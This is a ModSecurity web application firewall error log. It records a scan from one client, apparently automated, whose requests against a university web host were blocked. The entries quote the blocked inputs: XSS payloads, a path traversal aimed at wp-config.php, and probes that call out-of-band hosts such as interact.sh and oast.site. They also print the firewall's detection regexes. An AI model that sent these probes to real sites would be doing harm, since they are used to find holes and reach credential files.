[Tue Aug 29 11:51:40.903991 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnqj60AAAAC"]
[Tue Aug 29 11:51:42.537091 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAnGkKYAAAAR"]
[Tue Aug 29 11:51:44.665217 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnn1@AAAAAe"]
[Tue Aug 29 11:51:45.548698 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAfWOH4AAAAL"]
[Tue Aug 29 11:51:47.541501 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAnd3AwAAAAI"]
[Tue Aug 29 11:51:48.683681 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnepPMAAAAK"]
[Tue Aug 29 11:51:48.721557 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnf3mMAAAAM"]
[Tue Aug 29 11:51:50.718779 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAnmT3sAAAAd"]
[Tue Aug 29 11:51:51.539652 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAni@8AAAAAU"]
[Tue Aug 29 11:51:51.651247 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnqj80AAAAC"]
[Tue Aug 29 11:51:53.924275 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAnd3CIAAAAI"]
[Tue Aug 29 11:51:53.929542 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAnepQMAAAAK"]
[Tue Aug 29 11:51:54.594843 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15asCo-f0AAAm@500AAAAH"]
[Tue Aug 29 11:51:55.720603 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnh6N4AAAAS"]
[Tue Aug 29 11:51:56.543823 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAm80RkAAAAF"]
[Tue Aug 29 11:51:57.559734 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAn0GZAAAAAa"]
[Tue Aug 29 11:51:58.696890 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnd3CwAAAAI"]
[Tue Aug 29 11:51:59.548965 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAnIlmUAAAAV"]
[Tue Aug 29 11:51:59.591166 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAnd3C8AAAAI"]
[Tue Aug 29 11:52:01.555964 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAnIlmsAAAAV"]
[Tue Aug 29 11:52:02.714186 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAnkwd0AAAAY"]
[Tue Aug 29 11:52:02.723826 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAn40yQAAAAW"]
[Tue Aug 29 11:52:02.763958 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAn959IAAAAD"]
[Tue Aug 29 11:52:02.779741 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAlUlogAAAA0"]
[Tue Aug 29 11:52:04.820061 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAnIlnMAAAAV"]
[Tue Aug 29 11:52:04.896447 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb04x97h8urncm1b.oast.site/ found within TX:1: cjmnijtjmimvgniikdb04x97h8urncm1b.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAnkweQAAAAY"]
[Tue Aug 29 11:52:05.642447 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAnIlngAAAAV"]
[Tue Aug 29 11:52:06.628208 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAnd3EMAAAAI"]
